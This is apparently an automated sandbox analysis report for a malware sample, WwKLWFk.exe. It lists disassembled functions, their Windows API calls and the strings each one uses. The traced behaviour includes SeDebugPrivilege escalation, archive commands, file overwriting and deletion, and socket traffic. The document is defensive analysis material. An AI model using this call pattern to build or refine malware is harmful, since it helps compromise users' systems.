                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: ExitHandleModuleProcessQueryVirtual
                                    • String ID:
                                    • API String ID: 3946701194-0
                                    • Opcode ID: 42b0aaae3097e1424321bfa8d12490fb6f7b387d17ebc4fd3c65d9e47e62fc99
                                    • Instruction ID: f4de591dfdbcc4bd39d064ee357271aa394594d1aa371cc94731055114df2f1b
                                    • Opcode Fuzzy Hash: 42b0aaae3097e1424321bfa8d12490fb6f7b387d17ebc4fd3c65d9e47e62fc99
                                    • Instruction Fuzzy Hash: 2C114C71900304DFCB51DFADB885B7977F8EB94757B1044FAE80297290EB708D859B50
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 00B560DF
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00B56189
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00B561A5
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: Virtual$Free$Alloc
                                    • String ID:
                                    • API String ID: 1852963964-0
                                    • Opcode ID: bc25ba6ea4966d266aee93051df030cdaa3f870f6815e597889d202831388974
                                    • Instruction ID: 5e960f7d9f113b9773dc892eb5a98a1b7c3abf76f494900dceba221875ec2e4b
                                    • Opcode Fuzzy Hash: bc25ba6ea4966d266aee93051df030cdaa3f870f6815e597889d202831388974
                                    • Instruction Fuzzy Hash: 1F115B31A00649CFCB318F58CC817ED77E1EF45302FA94099DE89AB291DA722948CB94
                                    APIs
                                    • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,?,?,00B513EF), ref: 00B511AB
                                    • OpenProcessToken.ADVAPI32(00000000,00000028,00B513EF,?,?,?,?,?,?,00B513EF), ref: 00B511BB
                                    • AdjustTokenPrivileges.ADVAPI32(00B513EF,00000000,?,00000010,00000000,00000000), ref: 00B511EB
                                    • CloseHandle.KERNEL32(00B513EF), ref: 00B511FA
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00B513EF), ref: 00B51203
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00B511A5
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                    • String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                    • API String ID: 75692138-2197398117
                                    • Opcode ID: b7cb8c8e2535d0e04acedae1f21c1f4775560a9c71f146d4458643ede5c7c2bf
                                    • Instruction ID: 8f5da148ce2177ffa6b62f664bd34063b93e5fe1b59ef650316ce02b355ffab7
                                    • Opcode Fuzzy Hash: b7cb8c8e2535d0e04acedae1f21c1f4775560a9c71f146d4458643ede5c7c2bf
                                    • Instruction Fuzzy Hash: D001E875900309EFDB01DFD4CD89BAEBBF8FB04746F5044A9E605A2290DB715F449B50
                                    APIs
                                    • strstr.MSVCRT ref: 00B523CC
                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B52464
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00B52472
                                    • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00B524A8
                                    • memset.MSVCRT ref: 00B524B9
                                    • strrchr.MSVCRT ref: 00B524C9
                                    • wsprintfA.USER32 ref: 00B524DE
                                    • strrchr.MSVCRT ref: 00B524ED
                                    • memset.MSVCRT ref: 00B524F2
                                    • memset.MSVCRT ref: 00B52505
                                    • wsprintfA.USER32 ref: 00B52524
                                    • Sleep.KERNEL32(000007D0), ref: 00B52535
                                    • Sleep.KERNEL32(000007D0), ref: 00B5255D
                                    • memset.MSVCRT ref: 00B5256E
                                    • wsprintfA.USER32 ref: 00B52585
                                    • memset.MSVCRT ref: 00B525A6
                                    • wsprintfA.USER32 ref: 00B525CA
                                    • Sleep.KERNEL32(000007D0), ref: 00B525D0
                                    • Sleep.KERNEL32(000007D0,?,?), ref: 00B525E5
                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B525FC
                                    • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00B52611
                                    • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00B52642
                                    • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00B5265B
                                    • SetEndOfFile.KERNEL32 ref: 00B5266D
                                    • CloseHandle.KERNEL32(00000000), ref: 00B52676
                                    • RemoveDirectoryA.KERNEL32(?), ref: 00B52681
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                    • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\50ed6d56.exe
                                    • API String ID: 2203340711-1654081795
                                    • Opcode ID: 655ed721fa370343e1617687abfd6e6a0bbb5f94734b8b4de1fb9da75467e862
                                    • Instruction ID: 494f49fc4965c69c31766b4862422156cf722fe1277b3903422e4a1914db78e3
                                    • Opcode Fuzzy Hash: 655ed721fa370343e1617687abfd6e6a0bbb5f94734b8b4de1fb9da75467e862
                                    • Instruction Fuzzy Hash: D281C271504344BBD7109F60DC85FABB7ECEB89B46F04059AFA44D32A0DB70DA4D8B66
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00B51400), ref: 00B51226
                                    • GetProcAddress.KERNEL32(00000000), ref: 00B5122D
                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00B51400), ref: 00B5123F
                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00B51400), ref: 00B51250
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,00B51400), ref: 00B5129E
                                    • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,00B51400), ref: 00B512B0
                                    • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,00B51400), ref: 00B512F5
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00B51400), ref: 00B5130A
                                    Strings
                                    • ntdll.dll, xrefs: 00B51219
                                    • C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00B51262
                                    • ZwQuerySystemInformation, xrefs: 00B51212
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                    • String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$ZwQuerySystemInformation$ntdll.dll
                                    • API String ID: 1500695312-191650490
                                    • Opcode ID: ea66a4563450c8e9059b8acfbeaaf3bf992da5d83446b5b9950a18d98844c73b
                                    • Instruction ID: f53a0158390baed532cb26a6acdd2c86587c43a518cadeda2df4afac0f58d3a5
                                    • Opcode Fuzzy Hash: ea66a4563450c8e9059b8acfbeaaf3bf992da5d83446b5b9950a18d98844c73b
                                    • Instruction Fuzzy Hash: 8221F571605351ABD7209B69CC08B6BBAE8FB85F42F040DD8FA45E7280CB71DA49C7A5
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,00B52873,?,00000002), ref: 00B526A7
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,00B52873,?,00000002), ref: 00B526B5
                                    • lstrlen.KERNEL32(?), ref: 00B526C4
                                    • ??2@YAPAXI@Z.MSVCRT ref: 00B526CE
                                    • lstrcpy.KERNEL32(00000004,?), ref: 00B526E3
                                    • lstrcpy.KERNEL32(?,00000004), ref: 00B5271F
                                    • ??3@YAXPAX@Z.MSVCRT ref: 00B5272D
                                    • SetEvent.KERNEL32 ref: 00B5273C
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                    • String ID:
                                    • API String ID: 41106472-0
                                    • Opcode ID: f52893f554d1ef1c04b56d31524ff5c767660b139fe0224db209d5120b08fd3e
                                    • Instruction ID: de1195b1390054aba91248617892e50128e9bddc693d937a10ef1049829bebf3
                                    • Opcode Fuzzy Hash: f52893f554d1ef1c04b56d31524ff5c767660b139fe0224db209d5120b08fd3e
                                    • Instruction Fuzzy Hash: 90117C36501300AFCB22AF15EC48B6A7BF9FB9AB67B1440E5F85487260DB308D89DB50
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: lstrcatmemcpymemsetrandsrand
                                    • String ID: .exe
                                    • API String ID: 122620767-4119554291
                                    • Opcode ID: 8544ff02f8de08041b64c50fc4059bcd0d9b0175515692747178af2674bb0c88
                                    • Instruction ID: 852645498af85ed2283f5abc5019a77cb2f6465dcf46b7d39e4afd465a134d4b
                                    • Opcode Fuzzy Hash: 8544ff02f8de08041b64c50fc4059bcd0d9b0175515692747178af2674bb0c88
                                    • Instruction Fuzzy Hash: D4213B32E453906EE226133E6C41B693BD4CFA3B27F1A44E9FD851B2E2D6640DCDC261
                                    APIs
                                    • memset.MSVCRT ref: 00B518B1
                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,774D0F00,77068400), ref: 00B518D3
                                    • CloseHandle.KERNEL32(00B52549), ref: 00B518E9
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B518F0
                                    • GetExitCodeProcess.KERNEL32(?,00B52549), ref: 00B51901
                                    • CloseHandle.KERNEL32(?), ref: 00B5190A
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                    • String ID:
                                    • API String ID: 876959470-0
                                    • Opcode ID: ece3514bf6c8d62465becd234b9a049d8fabbe2dd03481496dff11bdc10aa9d9
                                    • Instruction ID: 133d8b92484eae835f048a6119fe3d2d2e8ce936a5a6f3161d83c3344a64c1b3
                                    • Opcode Fuzzy Hash: ece3514bf6c8d62465becd234b9a049d8fabbe2dd03481496dff11bdc10aa9d9
                                    • Instruction Fuzzy Hash: 1C01B132901228BBCB216B95DC08FDFBFBDEF85761F004061FA15A21A0C6314A18CAA0
                                    APIs
                                    • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00B513BC
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00B513DA
                                    • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00B51448
                                      • Part of subcall function 00B5119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,?,?,00B513EF), ref: 00B511AB
                                      • Part of subcall function 00B5119F: OpenProcessToken.ADVAPI32(00000000,00000028,00B513EF,?,?,?,?,?,?,00B513EF), ref: 00B511BB
                                      • Part of subcall function 00B5119F: AdjustTokenPrivileges.ADVAPI32(00B513EF,00000000,?,00000010,00000000,00000000), ref: 00B511EB
                                      • Part of subcall function 00B5119F: CloseHandle.KERNEL32(00B513EF), ref: 00B511FA
                                      • Part of subcall function 00B5119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00B513EF), ref: 00B51203
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00B513A8
                                    • SeDebugPrivilege, xrefs: 00B513D3
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                    • String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$SeDebugPrivilege
                                    • API String ID: 4123949106-3284628267
                                    • Opcode ID: 9a646c9b637a2a96155f07058a7f780b0114410ea7c3aa1676d9ee8a78f30bad
                                    • Instruction ID: 9be9ee02f6414c288f51815bfa249e5af825cf56b2eb9152af1ca68f2eeb55c2
                                    • Opcode Fuzzy Hash: 9a646c9b637a2a96155f07058a7f780b0114410ea7c3aa1676d9ee8a78f30bad
                                    • Instruction Fuzzy Hash: E9311071D40209AAEF209BA9CC55FEEBBF8EB44706F1445E9E904B2241D6709E49CF60
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00B51334
                                    • GetProcAddress.KERNEL32(00000000), ref: 00B5133B
                                    • memset.MSVCRT ref: 00B51359
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProcmemset
                                    • String ID: NtSystemDebugControl$ntdll.dll
                                    • API String ID: 3137504439-2438149413
                                    • Opcode ID: b490b44b3aa50ed2bdd67c390f0ac0e257f3b5ba848c22826a4787a0efd299ac
                                    • Instruction ID: b0620fdfa69a00e54e3e9c06f6b762ee501e4adbbd38cf55a95fe781e5fce4c0
                                    • Opcode Fuzzy Hash: b490b44b3aa50ed2bdd67c390f0ac0e257f3b5ba848c22826a4787a0efd299ac
                                    • Instruction Fuzzy Hash: 0F01617160030DBFDB10DFA8AC85B6FBBE8FB41716F0045EAFD01A2150D7708659CA55
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: strrchr$lstrcmpilstrcpylstrlen
                                    • String ID:
                                    • API String ID: 3636361484-0
                                    • Opcode ID: 5cf502b140049d2805811aa6c33730dfbd1fe70d63e1cc47247eb5e7f3f96188
                                    • Instruction ID: 4c3eb15befc3887ce3964301f86e14238228fc7f9d54779d4e444320b4540c8e
                                    • Opcode Fuzzy Hash: 5cf502b140049d2805811aa6c33730dfbd1fe70d63e1cc47247eb5e7f3f96188
                                    • Instruction Fuzzy Hash: 4201D6B29043196FEB215764EC49BD777DCDB04356F0404E6EE45E31D0EFB49A898BA0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: Timerandsrand$FileSystem
                                    • String ID:
                                    • API String ID: 4106363736-0
                                    • Opcode ID: 1690ac0c5ddd6fe17520225602ae27e5423afffa3b4fdac2012e764ea11db7b6
                                    • Instruction ID: a75f93de3875298d22115d15551af6a263d648909bd50545750087f98b4e367c
                                    • Opcode Fuzzy Hash: 1690ac0c5ddd6fe17520225602ae27e5423afffa3b4fdac2012e764ea11db7b6
                                    • Instruction Fuzzy Hash: A6E09277A10318BBD700A7A9EC46E9EBBECDE845A2B140566F600D3290E971E9448AB4
                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00B5603C
                                    • GetProcAddress.KERNEL32(00000000,00B56064), ref: 00B5604F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: kernel32.dll
                                    • API String ID: 1646373207-1793498882
                                    • Opcode ID: 9290ef91f53a5468f8a5a159c07ea34bed3e5ae9df0a3c3f4a5c2b3c4a2341a7
                                    • Instruction ID: a27b6590ab1ac039dd6a8db3403e1b317f28183a0aa21340d256232c0eb12faa
                                    • Opcode Fuzzy Hash: 9290ef91f53a5468f8a5a159c07ea34bed3e5ae9df0a3c3f4a5c2b3c4a2341a7
                                    • Instruction Fuzzy Hash: 50F0F6B11402898FDF70CE64CC84BDE37E4EB15711F9005AAED09CB281DB3486098B14

                                    Execution Graph

                                    Execution Coverage:1.9%
                                    Dynamic/Decrypted Code Coverage:2.3%
                                    Signature Coverage:0%
                                    Total number of Nodes:259
                                    Total number of Limit Nodes:25
                                    execution_graph 23553 821000 23555 821044 GetPEB 23553->23555 23557 821077 GetTempPathA 23555->23557 23558 82120b CreateFileA 23557->23558 23559 82122d 23558->23559 23674 28ec20 23675 28f0bf 23674->23675 23682 28ec5e 23674->23682 23676 28eca7 setsockopt recv 23676->23682 23678 28f0aa Sleep 23678->23675 23678->23682 23679 28ecff 23716 2d8330 23679->23716 23682->23675 23682->23676 23682->23678 23682->23679 23684 28f09c Sleep 23682->23684 23692 28db60 WSAStartup 23682->23692 23698 284a90 23682->23698 23701 28e060 23682->23701 23683 28ed38 recv 23685 28ed59 recv 23683->23685 23689 28ed7a 23683->23689 23684->23678 23685->23689 23687 2d8330 2 API calls 23687->23689 23689->23684 23689->23687 23690 28edf0 recv 23689->23690 23721 2d5a60 23689->23721 23738 28e460 6 API calls 23689->23738 23690->23689 23693 28db98 23692->23693 23697 28dc56 23692->23697 23694 28dc24 socket 23693->23694 23693->23697 23695 28dc3a connect 23694->23695 23694->23697 23696 28dc4c closesocket 23695->23696 23695->23697 23696->23694 23696->23697 23697->23682 23739 34c32a 23698->23739 23700 284a9b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23700->23682 23702 2d5a60 2 API calls 23701->23702 23705 28e0aa 23702->23705 23704 28e204 23706 28e44b 23704->23706 23709 28e22e 23704->23709 23746 2d58e0 23705->23746 23751 351e70 RtlAllocateHeap ___std_exception_copy __Getctype 23706->23751 23708 28e26e std::locale::_Locimp::_Locimp 23713 28e3b7 23708->23713 23715 28e393 WSASend 23708->23715 23709->23708 23710 2d8330 2 API calls 23709->23710 23710->23708 23714 28e423 23713->23714 23752 351e70 RtlAllocateHeap ___std_exception_copy __Getctype 23713->23752 23714->23682 23715->23708 23715->23713 23717 2d8377 23716->23717 23720 2d8348 std::locale::_Setgloballocale 23716->23720 23754 2db6b0 23717->23754 23719 2d838a 23719->23683 23720->23683 23722 2d5a8a 23721->23722 23723 2d5a9b 23722->23723 23724 2d5b42 23722->23724 23726 2d5aa7 std::locale::_Locimp::_Locimp 23723->23726 23728 2d5acc 23723->23728 23730 2d5b0e 23723->23730 23731 2d5b05 23723->23731 23788 272040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23724->23788 23726->23689 23727 2d5b47 23789 271fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 23727->23789 23732 34c950 std::_Facet_Register 2 API calls 23728->23732 23735 34c950 std::_Facet_Register 2 API calls 23730->23735 23736 2d5ae6 std::locale::_Locimp::_Locimp 23730->23736 23731->23727 23731->23728 23733 2d5adf 23732->23733 23733->23736 23790 351e70 RtlAllocateHeap ___std_exception_copy __Getctype 23733->23790 23735->23736 23736->23689 23738->23689 23742 34c92a 23739->23742 23743 34c338 23742->23743 23744 34c93b GetSystemTimePreciseAsFileTime 23742->23744 23743->23700 23744->23743 23747 2d5911 23746->23747 23748 2d58ee 23746->23748 23747->23704 23748->23747 23753 351e70 RtlAllocateHeap ___std_exception_copy __Getctype 23748->23753 23755 2db7fc 23754->23755 23756 2db6d5 23754->23756 23777 272040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23755->23777 23759 2db736 23756->23759 23760 2db743 23756->23760 23762 2db6ea 23756->23762 23758 2db801 23778 271fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 23758->23778 23759->23758 23759->23762 23764 2db6fa std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 23760->23764 23766 34c950 std::_Facet_Register 2 API calls 23760->23766 23769 34c950 23762->23769 23768 2db7ba std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 23764->23768 23779 351e70 RtlAllocateHeap ___std_exception_copy __Getctype 23764->23779 23766->23764 23768->23719 23771 34c955 std::_Facet_Register 23769->23771 23772 34c96f 23771->23772 23774 271fa0 Concurrency::cancel_current_task 23771->23774 23781 35b5ec 23771->23781 23772->23764 23773 34c97b 23773->23773 23774->23773 23780 34dd11 RtlAllocateHeap RtlAllocateHeap ___std_exception_destroy ___std_exception_copy 23774->23780 23776 271fe3 23776->23764 23777->23758 23778->23764 23780->23776 23786 3644ed __dosmaperr std::_Facet_Register 23781->23786 23782 36452b 23787 35a8ff RtlAllocateHeap __dosmaperr 23782->23787 23784 364516 RtlAllocateHeap 23785 364529 23784->23785 23784->23786 23785->23771 23786->23782 23786->23784 23787->23785 23788->23727 23789->23733 23916 2ec6a0 RtlAllocateHeap 23793 4e10aee 23794 4e10a81 GetCurrentHwProfileW 23793->23794 23796 4e10acd 23793->23796 23794->23796 23798 352a20 23801 35295e 23798->23801 23800 352a32 23804 35296a std::locale::_Setgloballocale 23801->23804 23802 352971 23819 35a8ff RtlAllocateHeap __dosmaperr 23802->23819 23804->23802 23806 352991 23804->23806 23805 352976 23820 351e60 RtlAllocateHeap ___std_exception_copy 23805->23820 23808 352996 23806->23808 23809 3529a3 23806->23809 23821 35a8ff RtlAllocateHeap __dosmaperr 23808->23821 23815 363d48 23809->23815 23812 3529ac 23814 352981 23812->23814 23822 35a8ff RtlAllocateHeap __dosmaperr 23812->23822 23814->23800 23816 363d54 std::_Lockit::_Lockit std::locale::_Setgloballocale 23815->23816 23823 363dec 23816->23823 23818 363d6f 23818->23812 23819->23805 23820->23814 